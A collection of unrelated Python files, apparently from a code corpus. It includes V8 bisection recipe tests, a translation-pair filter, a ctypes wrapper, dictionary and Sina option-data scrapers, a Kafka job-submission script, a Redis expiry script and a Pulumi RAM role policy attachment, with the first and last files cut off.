yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_override_changes', ) + api.properties( override_changes=[ {'revision': 'a1'}, {'revision': 'a2'}, {'revision': 'a3'}, ], ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # Disable bisection, because the failing test is too long compared to the # overall test time. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_tests_too_long', ) + api.v8.fail('Mjsunit') + api.time.step(7) ) # Bisect over range a1, a2, a3. Assume a2 is the culprit. # Same as above with a swarming builder_tester. yield ( api.v8.test( 'client.v8', 'V8 Linux - shared', 'bisect_swarming', ) + api.v8.fail('Check') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # Bisect over range a1, a2, a3. Assume a3 is the culprit. This is a tester # and the build for a2 is not available. Steps: # Bisect a0 -> no failures. # Bisect a1 -> no failures. # Report a2 and a3 as possible culprits. yield ( api.v8.test( 'client.v8', 'V8 Linux64', 'bisect_tester_swarming', ) + api.v8.fail('Check') + api.time.step(120) ) # Same as above with a slim swarming tester. yield ( api.v8.test( 'client.v8', 'V8 Linux64 - custom snapshot - debug', 'slim_bisect_tester_swarming', ) + api.v8.fail('Mjsunit') + api.override_step_data( 'Bisect a0.gsutil download isolated json', api.json.output({'mjsunit': '[dummy hash for bisection]'}), ) + api.override_step_data( 'Bisect a1.gsutil download isolated json', api.json.output({'mjsunit': '[dummy hash for bisection]'}), ) + api.time.step(120) ) # Same as above with a windows bot. Regression test making sure that # the swarming hashes are searched in a windows bucket. f = Filter() f = f.include_re(r'.*check build.*') yield ( api.v8.test( 'client.v8', 'V8 Win32', 'bisect', ) + api.v8.fail('Check') + api.post_process(f) + api.time.step(120) ) # Disable bisection due to a recurring failure. Steps: # Bisect a0 -> failures. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_recurring_failure', ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a0.Retry') + api.time.step(120) ) # Disable bisection due to less than two changes. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect_one_change', ) + api.v8.fail('Mjsunit') + api.url.json( 'Bisect.Fetch changes', api.v8.example_one_buildbot_change()) + api.override_step_data( 'Bisect.Get change range', api.v8.example_bisection_range_one_change(), ) + api.time.step(120) ) # Explicitly highlight slow tests not marked as slow. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'slow_tests', requester='commit-bot@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) + api.override_step_data( 'Check', api.v8.output_json(unmarked_slow_test=True)) ) # Test gerrit tryjobs. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng', 'gerrit', requester='commit-bot@chromium.org', gerrit_project='v8/v8', blamelist=['dude@chromium.org'], ) ) # Test gerrit tryjobs on coverage bot. yield ( api.v8.test( 'tryserver.v8', 'v8_linux64_sanitizer_coverage_rel', 'gerrit', requester='commit-bot@chromium.org', gerrit_project='v8/v8', blamelist=['dude@chromium.org'], ) ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - builder', 'with_gn', ) + api.override_step_data( 'generate_build_files', api.raw_io.stream_output( 'Writing """\\\n' 'goma_dir = "/b/build/slave/cache/cipd/goma"\n' 'target_cpu = "x64"\n' 'use_goma = true\n' '""" to /path/to/args.gn.\n' 'moar\n')) )
nilq/baby-python
python
#!/usr/bin/python -Wall # ================================================================ # Please see LICENSE.txt in the same directory as this file. # John Kerl # kerl.john.r@gmail.com # 2007-05-31 # ================================================================ ispec_mul_table = [99] ispec_inv_table = []
nilq/baby-python
python
# sys.path.append(os.getcwd() + '/..') # Uncomment for standalone running from abstract_filter import * import re class RepeatedChars(AbstractFilter): def __init__(self): self.num_of_scans = 0 self.src_language = "" self.trg_language = "" self.repeated_chars_re = None # def initialize(self, source_language, target_language, extra_args): self.num_of_scans = 0 self.src_language = extra_args['source language'] self.trg_language = extra_args['target language'] self.repeated_chars_re = re.compile(r"(\w)\1{2,}") if extra_args['emit scores'] == True: self.num_of_scans = 1 return def finalize(self): pass def process_tu(self, tu, num_of_finished_scans): minus_points = 0 src_repeated_chars = len(self.repeated_chars_re.findall(tu.src_phrase)) trg_repeated_chars = len(self.repeated_chars_re.findall(tu.trg_phrase)) if src_repeated_chars != trg_repeated_chars: return [0] return [1] def do_after_a_full_scan(self, num_of_finished_scans): pass def decide(self, tu): minus_points = 0 # - Repeated chars length ------------------------------------------------ # src_repeated_chars = self.repeated_chars_re.finditer(tu.src_phrase) # trg_repeated_chars = self.repeated_chars_re.finditer(tu.trg_phrase) # src_max_length_of_repeat = max(0, [len(x.group(0)) for x in src_repeated_chars]) # trg_max_length_of_repeat = max(0, [len(x.group(0)) for x in trg_repeated_chars]) # if (src_max_length_of_repeat > 3 and trg_max_length_of_repeat <= 3) or (src_max_length_of_repeat < 3 and trg_max_length_of_repeat > 3): # minus_points += 1 # - Repeated chars occurrence -------------------------------------------- src_repeated_chars = len(self.repeated_chars_re.findall(tu.src_phrase)) trg_repeated_chars = len(self.repeated_chars_re.findall(tu.trg_phrase)) if src_repeated_chars != trg_repeated_chars: minus_points += 1 if minus_points > 0: return 'reject' return 'accept'
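# A quick illustration of what the (\w)\1{2,} pattern counts: a character followed by
# at least two more copies of itself (three or more in a row). The example strings are
# hypothetical.
if __name__ == "__main__":
    demo_re = re.compile(r"(\w)\1{2,}")
    print(len(demo_re.findall("soooo good")))   # 1  ("oooo")
    print(len(demo_re.findall("so good")))      # 0  ("oo" is only two in a row)
    # A pair such as ("yesss", "yes") therefore counts 1 vs 0 matches and is rejected.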
nilq/baby-python
python
import itertools import random import logging import numpy as np import matplotlib.pyplot as plt import os #from evaluate_reservoir import * from utilis import * from args import args as my_args from evaluate_encoder import * from itertools import product import time if __name__ == '__main__': args = my_args() print(args.__dict__) # Fix the seed of all random number generator seed = 50 random.seed(seed) np.random.seed(seed) df = pd.DataFrame({ "dataset":[],"encode_thr_up":[],"encode_thr_dn":[],"tstep":[],"encode_refractory":[],"encode_interpfact":[],"firing_rate":[],"svm_score":[],"rf_score":[],"svm_score_baseline":[],"svm_score_comb":[],"rf_score_comb":[]}) parameters = dict( dataset = [ 'bci3'] ,encode_thr_up = [1.1] ,encode_thr_dn = [1.1] ,tstep=[500,3000] ,interpfact = [1] ,refractory = [1] #,tstep=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500] # , fold=[1,2,3] ) param_values = [v for v in parameters.values()] for args.dataset,args.encode_thr_up,args.encode_thr_dn, args.tstep, args.encode_interpfact,args.encode_refractory in product(*param_values): #args.tstep = tstep args.experiment_name = str(args.dataset)+str(args.encode_thr_up)+str(args.encode_thr_dn)+str(args.encode_interpfact)+str(args.encode_refractory) svm_score, rf_score, firing_rate, svm_score_baseline, svm_score_comb, rf_score_comb = evaluate_encoder(args) df = df.append({ "dataset":args.dataset, "fold":args.fold, "encode_thr_up":args.encode_thr_up, "encode_thr_dn":args.encode_thr_dn, "tstep": args.tstep, "encode_refractory": args.encode_refractory, "encode_interpfact": args.encode_interpfact, "firing_rate":firing_rate, "svm_score":svm_score, "rf_score":rf_score, "svm_score_baseline":svm_score_baseline, "svm_score_comb":svm_score_comb, "rf_score_comb":rf_score_comb },ignore_index=True) timestr = time.strftime("%Y%m%d-%H%M%S") log_file_name = 'accuracy_log'+str(timestr)+'.csv' pwd = os.getcwd() log_dir = pwd+'/log_dir/' df.to_csv(log_dir+log_file_name, index=False) df.to_csv(log_file_name, index=False) # logger.info('All done.')
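# A small illustration of how the parameter grid above expands: itertools.product over
# the dict values relies on insertion order (Python 3.7+) matching the unpacking order
# in the for-loop. The grid here is a trimmed, hypothetical example.
if __name__ == '__main__':
    demo_grid = dict(dataset=['bci3'], tstep=[500, 3000])
    print(list(product(*[v for v in demo_grid.values()])))
    # [('bci3', 500), ('bci3', 3000)]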
nilq/baby-python
python
#! /usr/bin/python

import ctypes
import os

__author__ = 'fyabc'

# Try to locate the shared library
_file = 'my_utils.dll'
_path = os.path.join(*(os.path.split(__file__)[:-1] + (_file,)))
_module = ctypes.cdll.LoadLibrary(_path)

# void myPrint(int)
myPrint = _module.myPrint
myPrint.argtypes = (ctypes.c_int,)
myPrint.restype = None

# int gcd(int, int)
gcd = _module.gcd
gcd.argtypes = (ctypes.c_int, ctypes.c_int)
gcd.restype = ctypes.c_int

# int inMandel(double, double, int)
inMandel = _module.inMandel
inMandel.argtypes = (ctypes.c_double, ctypes.c_double, ctypes.c_int)
inMandel.restype = ctypes.c_int

# int divMod(int, int, int*)
_divMod = _module.divMod
_divMod.argtypes = (ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int))
_divMod.restype = ctypes.c_int


def divMod(x, y):
    r = ctypes.c_int()
    q = _divMod(x, y, r)
    # Unwrap the ctypes object so callers get a plain Python int back.
    return q, r.value


# void avg(double*, int)
# Define a special type for the 'double *' argument
class DoubleArrayType:
    # ctypes looks for a method named exactly `from_param` when an instance of this
    # class is used in `argtypes`.
    def from_param(self, param):
        typename = type(param).__name__
        if hasattr(self, 'from_' + typename):
            return getattr(self, 'from_' + typename)(param)
        elif isinstance(param, ctypes.Array):
            return param
        else:
            raise TypeError('Cannot convert %s to a double array' % typename)

    # Cast from array.array objects


def test():
    print(myPrint(4))


if __name__ == '__main__':
    test()
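# A minimal, self-contained sketch of how such a converter is typically completed and
# wired to the C function. The helper names (from_list/from_tuple/from_array) and the
# final avg binding are assumptions; they are not part of the module as written above.
import ctypes as _ct


class _DoubleArraySketch:
    def from_param(self, param):
        typename = type(param).__name__
        if hasattr(self, 'from_' + typename):
            return getattr(self, 'from_' + typename)(param)
        if isinstance(param, _ct.Array):
            return param
        raise TypeError('Cannot convert %s to a double array' % typename)

    def from_list(self, param):
        # Build a ctypes double array straight from a Python list.
        return (_ct.c_double * len(param))(*param)
    from_tuple = from_list

    def from_array(self, param):
        # Reuse the buffer of an array.array('d', ...) without copying.
        if param.typecode != 'd':
            raise TypeError('must be an array of doubles')
        ptr, _ = param.buffer_info()
        return _ct.cast(ptr, _ct.POINTER(_ct.c_double))


# Hypothetical usage against the shared library (only if it actually exports avg):
#   avg = _module.avg
#   avg.argtypes = (_DoubleArraySketch(), ctypes.c_int)
#   avg.restype = None          # matching the "void avg(double*, int)" comment above
#   avg([1.0, 2.0, 3.0], 3)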
nilq/baby-python
python
import urllib.request import re import sys class WordReader: MEANING_URL = "https://dict.longdo.com/search/%s" @staticmethod def __get_url_content(url): fp = urllib.request.urlopen(url) content = fp.read().decode("utf8") fp.close() return content @staticmethod def get_phonetics(word): link = WordReader.CAMBRIDGE_URL % (word) html = WordReader.__get_url_content(link) pivot = 'class="phoneticspelling">' start = html.find(pivot) if start == -1: return "" end = html.find("</span>", start) phonetics = html[start + len(pivot) + 1: end - 1] phonetics = phonetics.replace('ˈ', '').replace('ˌ', '') if len(phonetics) == 0: return "@INVALID" start = 0 while start < len(phonetics): char = phonetics[start:start + 2] if char in WordReader.VALID_IPA: start = start + 2 else: char = phonetics[start:start + 1] if char in WordReader.VALID_IPA: start = start + 1 else: print(phonetics, "phonetics error at", start) return "@INVALID " + phonetics return phonetics @staticmethod def get_meanings(word): link = WordReader.MEANING_URL % (word) html = WordReader.__get_url_content(link) start = html.find('NECTEC') if (start == -1): return "" end = html.find('</table>', start) scope = html[start: end] start = 0 pivot = 'HREF="search/%s"' % (word) meanings = [] while True: start = scope.find(pivot, start) if start == -1: break start = scope.find('[', start) end = scope.find('</tr>', start) meaning = scope[start: end] meaning = re.sub(r'<[^>]*>', '', meaning) meaning = meaning.replace(' See also:', '') meaning = meaning.replace('[N]', '[n]').replace('[VI]', '[vi]').replace('[VT]', '[vt]').replace('[ADJ]', '[adj]').replace('[ADV]', '[adv]') sp = meaning.split(', Syn.') meanings.append(sp[0].replace(', ', ',')) if len(sp) > 1: meanings.append(' syn.' + sp[1].replace(',', ';')) return meanings[:-1] if len(sys.argv) > 1: words = sys.argv[1:] for word in words: print(word, "=", WordReader.get_meanings(word))
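# Note: get_phonetics() above references WordReader.CAMBRIDGE_URL and
# WordReader.VALID_IPA, which are not defined in this file; only the MEANING_URL path
# is exercised by the __main__ block above. A purely hypothetical sketch of what such
# definitions could look like (the URL and the symbol set are assumptions, not taken
# from the original source):
#
#   CAMBRIDGE_URL = "https://example.org/dictionary/%s"   # placeholder lookup URL
#   VALID_IPA = {'tʃ', 'dʒ', 'iː', 'uː', 'ɑː', 'ɔː', 'eɪ', 'aɪ', 'ɔɪ', 'aʊ', 'əʊ',
#                'a', 'b', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
#                'o', 'p', 'r', 's', 't', 'u', 'v', 'w', 'z', 'ð', 'θ', 'ŋ', 'ʃ',
#                'ʒ', 'æ', 'ə', 'ɪ', 'ʊ', 'ɒ', 'ʌ'}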
nilq/baby-python
python
# -*- coding: utf-8 -*- # Copyright 2017 The Chromium OS Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Module to manage failure message of builds.""" from __future__ import print_function import sys from chromite.lib import failure_message_lib assert sys.version_info >= (3, 6), 'This module requires Python 3.6+' class BuildFailureMessage(object): """Message indicating that changes failed to be validated. A failure message for a failed build, which is used to trige failures and detect bad changes. """ def __init__(self, message_summary, failure_messages, internal, reason, builder): """Create a BuildFailureMessage instance. Args: message_summary: The message summary string to print. failure_messages: A list of failure messages (instances of StageFailureMessage), if any. internal: Whether this failure occurred on an internal builder. reason: A string describing the failure. builder: The builder the failure occurred on. """ self.message_summary = str(message_summary) self.failure_messages = failure_messages or [] self.internal = bool(internal) self.reason = str(reason) # builder should match build_config, e.g. self._run.config.name. self.builder = str(builder) def __str__(self): return self.message_summary def BuildFailureMessageToStr(self): """Return a string presenting the information in the BuildFailureMessage.""" to_str = ('[builder] %s [message summary] %s [reason] %s [internal] %s\n' % (self.builder, self.message_summary, self.reason, self.internal)) for f in self.failure_messages: to_str += '[failure message] ' + str(f) + '\n' return to_str def MatchesExceptionCategories(self, exception_categories): """Check if all of the failure_messages match the exception_categories. Args: exception_categories: A set of exception categories (members of constants.EXCEPTION_CATEGORY_ALL_CATEGORIES). Returns: True if all of the failure_messages match a member in exception_categories; else, False. """ for failure in self.failure_messages: if failure.exception_category not in exception_categories: if (isinstance(failure, failure_message_lib.CompoundFailureMessage) and failure.MatchesExceptionCategories(exception_categories)): continue else: return False return True def HasExceptionCategories(self, exception_categories): """Check if any of the failure_messages match the exception_categories. Args: exception_categories: A set of exception categories (members of constants.EXCEPTION_CATEGORY_ALL_CATEGORIES). Returns: True if any of the failure_messages match a member in exception_categories; else, False. """ for failure in self.failure_messages: if failure.exception_category in exception_categories: return True if (isinstance(failure, failure_message_lib.CompoundFailureMessage) and failure.HasExceptionCategories(exception_categories)): return True return False
nilq/baby-python
python
''' this file contains time tests for scanner algorithms ''' from FreeAndSimpleScanner import * import unittest from time import time from random import uniform class AreaScannerMethodsTest(unittest.TestCase): @staticmethod def used_regions_sample(): usedRegions = [((5.5, 1), (7.5, 4)), ((1, 5.5), (3.5, 7.5))] return usedRegions @staticmethod def test_AreaScanner_scan_n_objects_for_time(n = 20): ur = AreaScannerMethodsTest.used_regions_sample() gameboardDim = (8,8) t = time() for i in range(n): # get random region for dim (8,8) wr = FreeAndSimpleScanner.random_region_in_dimensions(gameboardDim) a = AreaScanner.sloppy_area_scan_mp(ur, 0.1, wr) print("AREA :\t", a) rt = time() - t print("runtime for scanning {} objects :\t{}".format(n, rt)) if __name__ == "__main__": #t() unittest.main()
nilq/baby-python
python
import yaml
import json
import numpy as np
from json import dumps, loads
from kafka import KafkaProducer, KafkaConsumer
from fedrec.communications.messages import JobSubmitMessage
from fedrec.utilities import registry

with open("configs/dlrm_fl.yml", 'r') as cfg:
    config = yaml.load(cfg, Loader=yaml.FullLoader)

def init_kafka(config):
    producer_url = "{}:{}".format(
        config["producer_url"], config["producer_port"])
    return KafkaProducer(
        bootstrap_servers=[producer_url])

serializer = registry.construct("serializer", "json")
# config = config["multiprocessing"]["communications"]
producer = init_kafka(config["multiprocessing"]["communications"])
producer.send('job-request-trainer', value=serializer.serialize(JobSubmitMessage("test_run",[1,2],{},"id1","id2",None)))
producer.send('job-request-aggregator', value=serializer.serialize(JobSubmitMessage("test_run",[1,2],{},"id1","id2",None)))

with open("configs/dlrm_fl.yml", 'r') as cfg:
    config = yaml.load(cfg, Loader=yaml.FullLoader)

ag_config = {
    # Seed for RNG used in shuffling the training data.
    "data_seed" : 100,
    # Seed for RNG used in initializing the model.
    "init_seed" : 100,
    # Seed for RNG used in computing the model's training loss.
    # Only relevant with internal randomness in the model, e.g. with dropout.
    "model_seed" : 100}

from fedrec.python_executors.aggregator import Aggregator
from fedrec.utilities.logger import NoOpLogger
import experiments
import fl_strategies

agg = Aggregator(0, config, NoOpLogger())
st = agg.serialize()
message = JobSubmitMessage("test_run",[1,2],{},"id1","id2",st)
from fedrec.serialization.serializers import JobSubmitMessageSerializer
pst1 = JobSubmitMessageSerializer.serialize(message)
pst2 = JobSubmitMessageSerializer.serialize(message, file="/tmp/ser_des_test.pkl")
m1 = JobSubmitMessageSerializer.deserialize(pst1)
m2 = JobSubmitMessageSerializer.deserialize(pst2)

assert len(pst1) > len(pst2) # Since the file holds the pkl representation of the workerstate.
assert isinstance(m1, JobSubmitMessage)
assert isinstance(m2, JobSubmitMessage)
assert m1.workerstate.__dict__['model']
m2_weight = np.array(m2.workerstate.state_dict["model"]["emb_l.0.weight"])
m1_weight = np.array(m1.workerstate.state_dict["model"]["emb_l.0.weight"])
# Deserializing from memory and from file must yield identical model weights.
assert np.all(m2_weight == m1_weight)
nilq/baby-python
python
import urllib.request import csv import datetime from requests import get import fcntl # expireDate # http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay?date=201706 # frontrow = [ # 'Date', 'ExpireDate', 'OptionType', 'Strike', 'Contract Name', 'Last', # 'Bid', 'Ask', 'Change', '%Change', 'Volume', 'OpenInterest', # 'ImpliedVolatility', 'UnderlyingPrice' # ] SINA_GET_STOCK_NAME = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getStockName' SINA_GET_REMAINDER_DAY = 'http://stock.finance.sina.com.cn/futures/api/openapi.php/StockOptionService.getRemainderDay' SINA_JS_URL = 'http://hq.sinajs.cn/list=' # Following constant is not used anywhere, commented for now # frontrow = [ # 'RowID', 'Date', '买量', '买价bid', '最新价last', '卖价ask', '卖量', '振幅%change', '涨跌幅change', # '行权strike', '买量', '买价', '最新价', '卖价', '卖量', '振幅', '涨跌幅', '行权' # ] # TODO (chengcheng): For function match_twins, _get_paired_urls, _get_all_names, re_pair, etc. # We may need more details about the functionality in the doc, better with some examples, # or even better, giving more meaningful names. def _match_twins(year_month): suffix = '_510050' up_url = f'{SINA_JS_URL}OP_UP{suffix}{year_month}' down_url = f'{SINA_JS_URL}OP_DOWN{suffix}{year_month}' return _get_paired_urls([up_url, down_url]) def _get_paired_urls(twin_url_list: list) -> list: paired_stock_names = [] for url in twin_url_list: content = urllib.request.urlopen(url, None).read().decode('GBK') paired_stock_names.append(_get_all_names(content)) return _re_pair_stocks(paired_stock_names) def _get_all_names(content) -> list: content_start_position = content.find('"') + 1 stock_content = content[content_start_position:-3] stock_names = stock_content.split(',')[:-1] return stock_names def _re_pair_stocks(paired_urls) -> list: finished_pair = [] for index, item in enumerate(paired_urls[0]): finished_pair.append([item, paired_urls[1][index]]) return finished_pair def data_parser(double_query): row = [] for code in double_query: url = SINA_JS_URL + code data = urllib.request.urlopen(url, None).read().decode('GBK') params_start_position = data.find('=') + 2 params_seg = data[params_start_position:-3] params = params_seg.split(',') row.extend(params[0:8]) return row def _get_option_expiration_day(contract_month): """ Get option expiration dates :param string contract_month: string form like '201904' Example returned from sina API for '20190401': { "result": { "status": { "code": 0 }, "data": { "expireDay": "2019-04-24", "remainderDays": 2, "stockId": "510050", "cateId": "510050C1904", "zhulikanzhang": "", "zhulikandie": "" } } } Return format from this function: '2019-04-24' :return: string """ contract_date = '?date={month}01'.format(month=contract_month) expiration_date = get(SINA_GET_REMAINDER_DAY + contract_date).json()['result']['data']['expireDay'] return expiration_date def _get_option_contract_months(): """ Get option months, so that we don't need a loop from 1 to 12 Example returned from sina API: { "result": { "status": { "code": 0 }, "data": { "cateList": ["50ETF","50ETF"], "contractMonth": ["2019-04","2019-04","2019-05","2019-06","2019-09"], "stockId":"510050", "cateId":"510050C1906A02350" } } } Return format from this function: ['201904', '201905', '201906', '201909'] :return: list """ dates = get(SINA_GET_STOCK_NAME).json()['result']['data']['contractMonth'] return [''.join(i.split('-')) for i in dates[1:]] def write_data_to_csv(): """ Main entry of the crawler TODO: consider how do we want to run 
this? One-time, cron or service? :return: n/a """ start_time = datetime.datetime.now() with open('sina_stock_data.csv', 'w', newline='') as target_csv: fcntl.flock(target_csv.fileno(), fcntl.LOCK_EX) # Add write lock here print(f'Lock the file to write at {start_time}') writer = csv.writer(target_csv, delimiter=',') option_contract_months = _get_option_contract_months() print(f'Contract months: {option_contract_months}') for contract_month in option_contract_months: expiration_date = _get_option_expiration_day(contract_month) print(f'Start writing data for month {contract_month[4:]}') for pairs in _match_twins(contract_month[2:]): option_item_within_strike = data_parser(pairs) row_id = expiration_date + '-' + str(option_item_within_strike[7]) # date + strike as row_id writer.writerow([row_id] + [expiration_date] + option_item_within_strike) print(f'Done with data for month {contract_month[4:]}') end_time = datetime.datetime.now() print('Release the lock at {end_time}, the program takes: {runtime} sec'.format( end_time=end_time, runtime=(end_time - start_time).seconds) ) if __name__ == '__main__': write_data_to_csv()
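# A minimal sketch of how each CSV row is keyed: expiration date plus the strike
# (index 7 of the parsed quote, per the commented-out frontrow columns above).
# All values here are hypothetical.
if __name__ == '__main__':
    demo_expiration_date = '2019-04-24'
    demo_option_item = ['10', '0.0400', '0.0412', '0.0415', '20',
                        '3.2', '1.1', '2.750']   # call side only
    demo_row_id = demo_expiration_date + '-' + str(demo_option_item[7])
    print(demo_row_id)   # 2019-04-24-2.750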
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import (division, print_function, absolute_import, unicode_literals) import logging from itertools import imap from osrc.database import get_pipeline, format_key # The default time-to-live for every key. DEFAULT_TTL = 2 * 7 * 24 * 60 * 60 TEMP_TTL = 24 * 60 * 60 def set_expire(): pipe = get_pipeline() # Get the list of all keys. keys = pipe.keys().execute()[0] n = float(len(keys)) print("Found {0:.0f} keys".format(n)) # Loop over the keys and deal with each one. for i, key in enumerate(keys): # Skip the opt-out keys. if key.endswith(":optout"): continue # Deal with temporary keys. if any(imap(key.endswith, [":name", ":etag", ":gravatar", ":tz"])): pipe.expire(key, TEMP_TTL) continue # Everything else should get the default TTL. pipe.expire(key, DEFAULT_TTL) # Execute the updates in batches. if (i+1) % 5000 == 0: print("Finished {0} keys [{1:.2f} %]".format(i+1, (i+1)/n*100)) pipe.execute() pipe.execute() def del_connections(): pipe = get_pipeline() # Get the list of all keys. keys = pipe.keys(format_key("social:connection:*")).execute()[0] n = float(len(keys)) print("Found {0:.0f} keys".format(n)) # Loop over the keys and deal with each one. for i, key in enumerate(keys): pipe.delete(key) pipe.execute() if __name__ == "__main__": import argparse from osrc import create_app # Parse the command line arguments. parser = argparse.ArgumentParser( description="Add expiry dates to everything") parser.add_argument("--config", default=None, help="The path to the local configuration file.") parser.add_argument("--log", default=None, help="The path to the log file.") parser.add_argument("--connections", action="store_true", help="Delete the connections?") args = parser.parse_args() largs = dict(level=logging.INFO, format="[%(asctime)s] %(name)s:%(levelname)s:%(message)s") if args.log is not None: largs["filename"] = args.log logging.basicConfig(**largs) # Initialize a flask app. app = create_app(args.config) # Set up the app in a request context. with app.test_request_context(): if args.connections: del_connections() else: set_expire()
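# For reference, the TTLs defined above work out to:
#   DEFAULT_TTL = 2 * 7 * 24 * 60 * 60 = 1209600 s  (14 days)
#   TEMP_TTL    =         24 * 60 * 60 = 86400 s    (1 day)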
nilq/baby-python
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['RolePolicyAttachmentArgs', 'RolePolicyAttachment'] @pulumi.input_type class RolePolicyAttachmentArgs: def __init__(__self__, *, policy_name: pulumi.Input[str], policy_type: pulumi.Input[str], role_name: pulumi.Input[str]): """ The set of arguments for constructing a RolePolicyAttachment resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ pulumi.set(__self__, "policy_name", policy_name) pulumi.set(__self__, "policy_type", policy_type) pulumi.set(__self__, "role_name", role_name) @property @pulumi.getter(name="policyName") def policy_name(self) -> pulumi.Input[str]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @policy_name.setter def policy_name(self, value: pulumi.Input[str]): pulumi.set(self, "policy_name", value) @property @pulumi.getter(name="policyType") def policy_type(self) -> pulumi.Input[str]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @policy_type.setter def policy_type(self, value: pulumi.Input[str]): pulumi.set(self, "policy_type", value) @property @pulumi.getter(name="roleName") def role_name(self) -> pulumi.Input[str]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name") @role_name.setter def role_name(self, value: pulumi.Input[str]): pulumi.set(self, "role_name", value) @pulumi.input_type class _RolePolicyAttachmentState: def __init__(__self__, *, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering RolePolicyAttachment resources. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. 
""" if policy_name is not None: pulumi.set(__self__, "policy_name", policy_name) if policy_type is not None: pulumi.set(__self__, "policy_type", policy_type) if role_name is not None: pulumi.set(__self__, "role_name", role_name) @property @pulumi.getter(name="policyName") def policy_name(self) -> Optional[pulumi.Input[str]]: """ Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. """ return pulumi.get(self, "policy_name") @policy_name.setter def policy_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "policy_name", value) @property @pulumi.getter(name="policyType") def policy_type(self) -> Optional[pulumi.Input[str]]: """ Type of the RAM policy. It must be `Custom` or `System`. """ return pulumi.get(self, "policy_type") @policy_type.setter def policy_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "policy_type", value) @property @pulumi.getter(name="roleName") def role_name(self) -> Optional[pulumi.Input[str]]: """ Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ return pulumi.get(self, "role_name") @role_name.setter def role_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "role_name", value) class RolePolicyAttachment(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, policy_name: Optional[pulumi.Input[str]] = None, policy_type: Optional[pulumi.Input[str]] = None, role_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Provides a RAM Role attachment resource. ## Example Usage ```python import pulumi import pulumi_alicloud as alicloud # Create a RAM Role Policy attachment. role = alicloud.ram.Role("role", document=\"\"\" { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "Service": [ "apigateway.aliyuncs.com", "ecs.aliyuncs.com" ] } } ], "Version": "1" } \"\"\", description="this is a role test.", force=True) policy = alicloud.ram.Policy("policy", document=\"\"\" { "Statement": [ { "Action": [ "oss:ListObjects", "oss:GetObject" ], "Effect": "Allow", "Resource": [ "acs:oss:*:*:mybucket", "acs:oss:*:*:mybucket/*" ] } ], "Version": "1" } \"\"\", description="this is a policy test", force=True) attach = alicloud.ram.RolePolicyAttachment("attach", policy_name=policy.name, policy_type=policy.type, role_name=role.name) ``` ## Import RAM Role Policy attachment can be imported using the id, e.g. ```sh $ pulumi import alicloud:ram/rolePolicyAttachment:RolePolicyAttachment example role:my-policy:Custom:my-role ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] policy_name: Name of the RAM policy. This name can have a string of 1 to 128 characters, must contain only alphanumeric characters or hyphen "-", and must not begin with a hyphen. :param pulumi.Input[str] policy_type: Type of the RAM policy. It must be `Custom` or `System`. :param pulumi.Input[str] role_name: Name of the RAM Role. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen. """ ... 
